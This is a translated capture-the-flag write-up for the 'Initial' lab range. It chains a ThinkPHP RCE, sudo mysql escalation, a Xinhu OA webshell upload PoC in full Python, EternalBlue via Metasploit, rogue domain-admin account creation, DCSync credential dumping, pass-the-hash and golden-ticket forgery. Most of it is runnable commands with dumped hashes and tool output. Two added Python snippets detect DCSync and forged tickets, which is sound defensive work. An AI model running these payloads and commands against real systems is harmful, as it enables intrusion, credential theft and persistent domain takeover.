Internal network penetration tactics: the 春秋云境 "Initial" range
Initial
Key points:
- ThinkPHP 5.0.23 RCE
- Privilege escalation through sudo mysql
- Xinhu (信呼) OA n-day
- MS17-010 (EternalBlue)
- DCSync to obtain NTLM hashes, then pass-the-hash (PTH)
- Golden ticket for persistence
How DCSync works: it abuses the data synchronisation (replication) that takes place between domain controllers.
DCSync is a common credential-theft technique in AD domain penetration. By default, the DCs in a domain synchronise data with each other every 15 minutes. When one DC pulls data from another, the requesting side uses the Directory Replication Service Remote Protocol (MS-DRSR) to replicate the domain users' password data from the other DC. DCSync exploits exactly this: it "impersonates" a DC and sends a replication request to a real DC, receiving the users' credential data in return. Because the attack uses the Windows RPC protocol, it requires neither logging on to the DC nor dropping a file on it, so it avoids triggering EDR alerts; this makes DCSync a very stealthy way of stealing credentials.
Prerequisites for a DCSync attack:
To perform DCSync you must hold the privileges of one of the following:
- a user in the Administrators group
- a user in the Domain Admins group
- a user in the Enterprise Admins group
- the computer account of a domain controller
In other words, the domain admin groups have this right by default.
At the DACL level, to initiate DCSync the caller must hold the following two highly privileged rights in the ACL (access control list) of the domain object:
- DS-Replication-Get-Changes (Replicating Directory Changes)
- DS-Replication-Get-Changes-All (Replicating Directory Changes All)
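The two rights above are exactly what a defender can audit for. The following detection is an added example (not code from the write-up): it flags Security Event ID 4662 records in which a principal other than a known DC successfully exercises the replication rights. The event records, the dict field names and the DC inventory are constructed for the demo; the two GUIDs are the well-known control-access-right GUIDs of the rights named above.

```python
# Added example (not from the original write-up): flag DCSync-style replication
# requests in Windows Security Event ID 4662 records. Event records are
# constructed here as dicts; a real pipeline would feed parsed EVTX/XML fields.
import re

REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumption for this demo: the domain's DC machine accounts, which replicate legitimately.
KNOWN_DC_ACCOUNTS = {"DC01$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights(properties: str) -> list:
    """Names of the replication rights present in a 4662 'Properties' field."""
    return [REPL_GUIDS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPL_GUIDS]


def is_dcsync_candidate(event: dict) -> bool:
    """True when a non-DC principal successfully uses DS-Replication-Get-Changes-All."""
    if event.get("EventID") != 4662 or event.get("Keywords") != "Audit Success":
        return False
    if event.get("AccessMask") != "0x100":      # 0x100 = Control Access
        return False
    if "DS-Replication-Get-Changes-All" not in replication_rights(event.get("Properties", "")):
        return False
    return event.get("SubjectUserName", "") not in KNOWN_DC_ACCOUNTS


def find_dcsync(events: list) -> list:
    """Return the principals that triggered a DCSync candidate event."""
    return [e["SubjectUserName"] for e in events if is_dcsync_candidate(e)]


# Constructed sample events: a legitimate DC-to-DC replication, a replication
# request from a workstation machine account, and an unrelated 4662.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Keywords": "Audit Success", "SubjectUserName": "DC01$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Keywords": "Audit Success", "SubjectUserName": "XIAORANG-WIN7$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Keywords": "Audit Success", "SubjectUserName": "Marcus",
     "AccessMask": "0x10", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    print(find_dcsync(SAMPLE_EVENTS))   # ['XIAORANG-WIN7$']
```

Accounts that legitimately replicate (for example Azure AD Connect service accounts) belong in the allow-list alongside the DCs; everything else exercising these rights deserves an alert.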
ThinkPHP host (external-facing)
Reverse shell via vshell
find / -type f -iname "flag*" 2>/dev/null
No flag found; we are www-data, so privilege escalation is needed.
www-data@ubuntu-web01:/var/www/html$ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
sudo mysql -e '\! /bin/sh'
find / -type f -iname "flag*" 2>/dev/null
cat /root/flag/flag01.txt
flag01: flag{60b53231-
fscan
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:31:9a:13 brd ff:ff:ff:ff:ff:ff
inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 1892158357sec preferred_lft 1892158357sec
inet6 fe80::216:3eff:fe31:9a13/64 scope link
valid_lft forever preferred_lft forever
./fscan -h 172.22.1.15/16
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.21
主机名: XIAORANG-WIN7
发现的网络接口:
IPv4地址:
└─ 172.22.1.21
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-12-01 20:52:23] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-12-01 20:52:23] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.2
主机名: DC01
发现的网络接口:
IPv4地址:
└─ 172.22.1.2
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-12-01 20:52:23] [SUCCESS] 网站标题 http://172.22.1.18 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.1.18?m=login
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.18
主机名: XIAORANG-OA01
发现的网络接口:
IPv4地址:
└─ 172.22.1.18
[2025-12-01 20:52:23] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012 标题:信呼协同办公系统
Tunnel / proxy
172.22.1.18: Xinhu (信呼) collaborative office system
Weak credentials admin:admin123
Use the known PoC:
# 1.php is the webshell to upload
# The following values need to be changed:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',
import requests

session = requests.session()
url_pre = 'http://<IP>/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'   # login endpoint
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'   # upload endpoint
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'   # built below once the file id is known
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': '<ADMINUSER_BASE64>',
    'adminpass': '<ADMINPASS_BASE64>',
    'yanzm': ''
}
r = session.post(url1, data=data1)                       # log in with the admin credentials
with open('1.php', 'rb') as f:                           # upload in binary mode
    r = session.post(url2, files={'file': f})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'   # path the file will have after the task renames it
print(filepath)
file_id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)                                    # run the task for the uploaded file
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
Output:
D:\python3.11.2\python3.exe F:\111_pythonstudy\渗透\信呼OA.py
/upload/2025-12/01_20573729.php
<br />
<b>Notice</b>: Undefined offset: 0 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-12\01_20573729.php</b> on line <b>1</b><br />
Connect with AntSword (蚁剑) to http://172.22.1.18/upload/2025-12/01_20573729.php
Both reverse and bind shells from the Windows host failed.
for /r C:\ %i in (flag*) do @echo %i 2>nul
C:\Program Files (x86)\Alibaba\Aegis\PythonLoader\third_party\pymysql\constants\FLAG.py
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag02.txt.lnk
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
C:\Users\Administrator\flag\flag02.txt
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
type C:\Users\Administrator\flag\flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
The hint says to attack the DC.
172.22.1.21: EternalBlue
vim /etc/proxychains.conf
175.27.251.122 17789
proxychains msfconsole
Note: with this approach the shell tends to hang once obtained, because of how proxychains behaves.
It is better to set the proxy from inside msf6 instead: set Proxies socks5:175.27.251.122:17888
For encoding problems: set consoleencoding gbk
Next, attack with EternalBlue:
search MS17-010
use 0
options
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhosts 172.22.1.21
run
Then drop into a shell.
exit returns to meterpreter.
Shell obtained.
This internal host has no flag; it must be on the DC, so we need a way to move laterally to the domain controller.
Encoding problems
chcp 65001 #fix the encoding inside the shell
set consoleencoding gbk #fix the msf console encoding
shell
chcp 65001 #switch the console code page to UTF-8
C:\Windows\system32>for /r C:\ %i in (flag*) do @echo %i 2>nul
for /r C:\ %i in (flag*) do @echo %i 2>nul
C:\Program Files (x86)\Alibaba\Aegis\PythonLoader\third_party\pymysql\constants\FLAG.py
C:\Program Files (x86)\Alibaba\Aegis\PythonLoaderTemp\third_party\pymysql\constants\FLAG.py
rdp
Add a local user
net user test Abc123456 /add
net localgroup administrators test /add
net user hackuser Abc123456! /add /domain
net group "Domain Admins" hackuser /add /domain
XIAORANG-WIN7\test:Abc123456 can log in.
Then run DCSync.
#load the Mimikatz module
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 4e3ed87898637057eed824113569fe69 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ c284e5ff66b727cbb253da7b58964502 4096
1108 XIAORANG-WIN7$ 38ce501bcbef7c273d936cb4430fb69a 4096
secretsdump.py from the Impacket library also works directly.
load kiwi
kiwi_cmd sekurlsa::logonpasswords
Captured the NTLM hash of XIAORANG-WIN7$: 38ce501bcbef7c273d936cb4430fb69a
proxychains python3 /root/Desktop/tools/secretsdump.py 'xiaorang.lab/XIAORANG-WIN7$@172.22.1.2' -hashes :38ce501bcbef7c273d936cb4430fb69a
Administrator:500:aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb812eea13a18b7fcdb8e6d67ddc205b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Marcus:1106:aad3b435b51404eeaad3b435b51404ee:e07510a4284b3c97c8e7dee970918c5c:::
Charles:1107:aad3b435b51404eeaad3b435b51404ee:f6a9881cd5ae709abb4ac9ab87f24617:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:4e3ed87898637057eed824113569fe69:::
XIAORANG-OA01$:1104:aad3b435b51404eeaad3b435b51404ee:c284e5ff66b727cbb253da7b58964502:::
XIAORANG-WIN7$:1108:aad3b435b51404eeaad3b435b51404ee:38ce501bcbef7c273d936cb4430fb69a:::
[*] Kerberos keys grabbed
Pass the Hash
Pass The Hash (PTH) is a fairly common term in internal network penetration: by passing the hash of a Windows local account or domain user, the attacker gains control of other servers.
After getting into an enterprise network, in environments with many Windows PCs or servers it is very likely that hash passing will be used for lateral movement. Enterprises now generally enforce password-strength requirements, so a captured local hash may not be crackable; in addition, Microsoft disables the LM hash by default starting with Windows Vista and Windows Server 2008, and from Windows Server 2012 R2 onwards the plaintext password is no longer kept in memory by default. In these cases the hash itself can be passed to move laterally.
Applicable scenario: many hosts in the network share the same password.
The principle of hash passing is that authentication does not use the user's password directly but the user's hash; therefore an attacker can access remote hosts or services directly with the LM hash or NTLM hash, without supplying the plaintext password. Windows normally uses NTLM authentication, where NTLM is the hash value derived from the password. PTH relies on the SMB service (ports 139 and 445).
Get a shell with wmiexec or psexec
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
proxychains python3 /root/Desktop/tools/psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
Or use CME (crackmapexec)
-x run the command via cmd.exe
-X run a PowerShell command via cmd.exe
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
Or use the NTLM hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
By default the logon domain is chosen automatically; -d specifies the domain to log on to, -x the command to run.
CME tries the following execution methods in order:
1. wmiexec: run the command via WMI
2. atexec: run the command through a task scheduled with the Windows Task Scheduler
3. smbexec: run the command by creating and starting a service
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
Note that PTH through mimikatz does not work here: on success it pops a new shell window, which cannot be used from within msf.
kiwi_cmd sekurlsa::pth /user:administrator /domain:172.22.1.2 /ntlm:10cf89a850fb1cdbe6bb432b859164c8
The krbtgt account can also be used here.
The krbtgt account:
- the Kerberos Ticket Granting Ticket service account
- the most important account on the domain controller
- its NTLM hash is used to sign Kerberos tickets
- having the krbtgt NTLM hash = being able to forge a golden ticket
- golden ticket = permanent domain administrator privileges
- the golden ticket stays valid even after the domain admin password is changed
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2022/6/5 20:40:39
Object Security ID : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID : 502
Credentials:
Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
lm - 0: c4f45322c850c77aecb3aa71c2e44c1e
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 849f7f8ab6eb3b3a1c7c926de5ee5574
* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
aes128_hmac (4096) : 207ea00513bdf19042937aa38c9ad2dd
des_cbc_md5 (4096) : c70ee386138c7016
* Primary:Kerberos *
Default Salt : XIAORANG.LABkrbtgt
Credentials
des_cbc_md5 : c70ee386138c7016
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
kiwi_cmd kerberos::purge #clear the cached tickets
or
shell
klist purge
exit
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917 /rc4:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
•Note: the SID here must not include the trailing -502.
•The ticket claims "I am administrator" and is signed with the krbtgt hash, which the DC trusts; with /ptt it is injected into the current session, which now has domain-admin privileges.
# Check if the ticket is in memory
kiwi_cmd kerberos::list
[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2025/12/4 21:46:05 ; 2035/12/2 21:46:05 ; 2035/12/2 21:46:05
Server Name : krbtgt/xiaorang.lab @ xiaorang.lab
Client Name : administrator @ xiaorang.lab
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
# Verify access (should list the DC's C$ share)
shell
With the golden ticket, any PC in the domain can now be accessed.
dir \\DC01.xiaorang.lab\c$
type \\DC01.xiaorang.lab\c$\Users\Administrator\flag\flag03.txt
dir \\XIAORANG-OA01.xiaorang.lab\c$
type \\XIAORANG-OA01.xiaorang.lab\c$\Users\Administrator\flag\flag02.txt
Or use Impacket:
proxychains python3 /root/Desktop/tools/ticketer.py -nthash fb812eea13a18b7fcdb8e6d67ddc205b -domain-sid S-1-5-21-314492864-3856862959-4045974917-502 -domain xiaorang.lab Administrator
Note: the SID here must not include the trailing -502.
export KRB5CCNAME=/root/Administrator.ccache
# -k: use Kerberos authentication
# -no-pass: do not prompt for a password
sudo sh -c "echo '172.22.1.2 DC01.xiaorang.lab xiaorang.lab' >> /etc/hosts"
proxychains python3 /root/Desktop/tools/wmiexec.py -k -no-pass xiaorang.lab/Administrator@DC01.xiaorang.lab
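The kerberos::list output above shows the two things a defender can key on: a TGT whose End time is ten years after Start (the kerberos::golden default, far beyond the AD default MaxTicketAge of 10 hours) and an RC4 (etype 0x17) TGT in a domain whose accounts have AES keys. The following parser is an added example (not code from the write-up) that audits ticket listings in that format; the sample text is constructed to mirror the page's output.

```python
# Added example (not from the original write-up): audit mimikatz
# kerberos::list-style ticket listings for golden-ticket indicators.
from datetime import datetime, timedelta
import re

MAX_TICKET_AGE = timedelta(hours=10)   # assumed domain policy (AD default)

ENTRY_RE = re.compile(
    r"\[(?P<idx>\d+)\] - 0x(?P<etype>[0-9a-f]+) - (?P<ename>\w+)\s+"
    r"Start/End/MaxRenew:\s*(?P<start>\S+ \S+) ; (?P<end>\S+ \S+) ; (?P<renew>\S+ \S+)\s+"
    r"Server Name\s*:\s*(?P<server>\S+) @ (?P<realm>\S+)\s+"
    r"Client Name\s*:\s*(?P<client>\S+) @ \S+",
    re.I)


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y/%m/%d %H:%M:%S")


def audit_tickets(text: str) -> list:
    """One finding per TGT that exceeds the lifetime policy or uses RC4."""
    findings = []
    for m in ENTRY_RE.finditer(text):
        if not m["server"].lower().startswith("krbtgt/"):
            continue    # only TGTs are relevant for golden-ticket checks
        lifetime = _ts(m["end"]) - _ts(m["start"])
        reasons = []
        if lifetime > MAX_TICKET_AGE:
            reasons.append(f"lifetime of {lifetime.days} days exceeds policy")
        if int(m["etype"], 16) == 0x17:
            reasons.append("RC4 TGT in an AES-capable domain")
        if reasons:
            findings.append({"client": m["client"], "realm": m["realm"], "reasons": reasons})
    return findings


# Constructed sample: a forged TGT followed by a normally issued one.
SAMPLE = """\
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2025/12/4 21:46:05 ; 2035/12/2 21:46:05 ; 2035/12/2 21:46:05
   Server Name       : krbtgt/xiaorang.lab @ xiaorang.lab
   Client Name       : administrator @ xiaorang.lab
[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 2025/12/4 21:00:00 ; 2025/12/5 07:00:00 ; 2025/12/11 21:00:00
   Server Name       : krbtgt/xiaorang.lab @ xiaorang.lab
   Client Name       : Charles @ xiaorang.lab
"""

if __name__ == "__main__":
    for finding in audit_tickets(SAMPLE):
        print(finding)
```

The same two checks apply to Event ID 4769 on the DC (ticket encryption type 0x17 for an account with AES keys); the durable fix after a krbtgt compromise is to reset the krbtgt password twice so that previously forged tickets stop validating.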
Try PTH with the Marcus user, since Marcus is also in the Domain Admins group.
C:\Windows\system32>net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain xiaorang.lab.
Group name Domain Admins
Comment ����������Ա
Members
-------------------------------------------------------------------------------
Administrator Marcus
The command completed successfully.
┌──(root㉿kali)-[~]
└─# proxychains crackmapexec smb 172.22.1.2 -u Marcus -He07510a4284b3c97c8e7dee970918c5c -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:445 ... OK
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [-] xiaorang.lab\Marcus:e07510a4284b3c97c8e7dee970918c5c STATUS_PASSWORD_EXPIRED
But it returns STATUS_PASSWORD_EXPIRED: the password has expired.
Try setting a new password for the account:
proxychains /root/Desktop/tools/smbpasswd.py xiaorang.lab/Marcus@172.22.1.2 -hashes :e07510a4284b3c97c8e7dee970918c5c -newpass NewPassword123!
Error:
SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Not permitted; this route is a dead end.
One user remains: Charles.
net user Charles /domain
User name Charles
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2022/6/5 22:03:36
Password expires 2022/7/17 22:03:36
Password changeable 2022/6/6 22:03:36
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2022/6/5 22:51:12
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
proxychains crackmapexec smb 172.22.1.2 -u Charles -H f6a9881cd5ae709abb4ac9ab87f24617 -x "type C:\Users\Charles\flag\flag04.txt"
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :f6a9881cd5ae709abb4ac9ab87f24617 xiaorang.lab/Charles@172.22.1.2
proxychains crackmapexec smb 172.22.1.2 -u Charles -H f6a9881cd5ae709abb4ac9ab87f24617 -x "dir C:\Users\Charles\flag"
#STATUS_PASSWORD_EXPIRED every time: all of these passwords have expired
The only option left is to change the password with Administrator privileges, which has no practical value here.
# 1. Connect (using the Administrator hash: 10cf89a850fb1cdbe6bb432b859164c8)
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2
# 2. Run the reset command in the wmiexec shell
C:\> net user Charles NewPass123! /domain
